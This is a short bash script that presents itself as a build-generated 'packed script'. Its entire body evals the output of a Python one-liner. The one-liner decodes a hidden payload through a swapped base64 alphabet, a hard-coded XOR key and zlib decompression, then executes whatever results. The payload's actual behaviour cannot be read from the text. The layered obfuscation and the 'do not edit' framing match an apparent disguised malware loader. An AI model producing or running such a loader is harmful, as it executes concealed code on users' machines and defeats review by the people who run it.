#!/usr/bin/env bash
# Packed script — generated by Scripts/build/pack.py. Do not edit.
# (The readable source lives with the project author.)
eval "$(python3 -c "
import base64, zlib
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = 'qZ3mK9xVdWyB1pS7nRc8LtJfE0hUoI4aXwG6vN2bY5rQiOgMlAjszDkCePFuHT+/'
k = b'K\x19~\x825\xc1\no\x91-'
p = '1H7sz/c7j3+9vhRSn5JCLLQKoyOFcS+x4DNodZJT2haEytZkzudbxlCFSfrlMe1qxGMYmNZ0YGsxzl6zw0qw2pGg6PMq4/gL1vn7UnvSpPbSWt8brJ31S/GILOiGUeJfHxhVVAPWIjedljLyVLkUJja3FrKAMB2W+r7jBkL8ZgNwItKcjyO9XCLTDK0fa7YSiZWrVghcHvRF9EvhwflAVN5mSB2R1S+WruKvkPMZZtjbYL43pTbatU06RxvpVpQUI1AttRGI1oFi4PfNFroTqnAFalJYNROKU2+WcvVwLYr6qqFRvkAwLg/WQ990Nu82tgYbkXk2YlH/3TmWJpdVQgroU3eZ2w7pYSr0lPwJdofuRZ85/oyLm1KNf9+foW7THvWL4S53QGuCtk3nVaG4t0k8Jh0gmhUcSD0KD9pB8fS/XtmFlviPYDjiaGavApR+3bWu2wq='.translate(str.maketrans(c, a))
raw = base64.b64decode(p)
d = bytes(v ^ k[i % len(k)] for i, v in enumerate(raw))
import sys; sys.stdout.write(zlib.decompress(d).decode('utf-8'))
")"
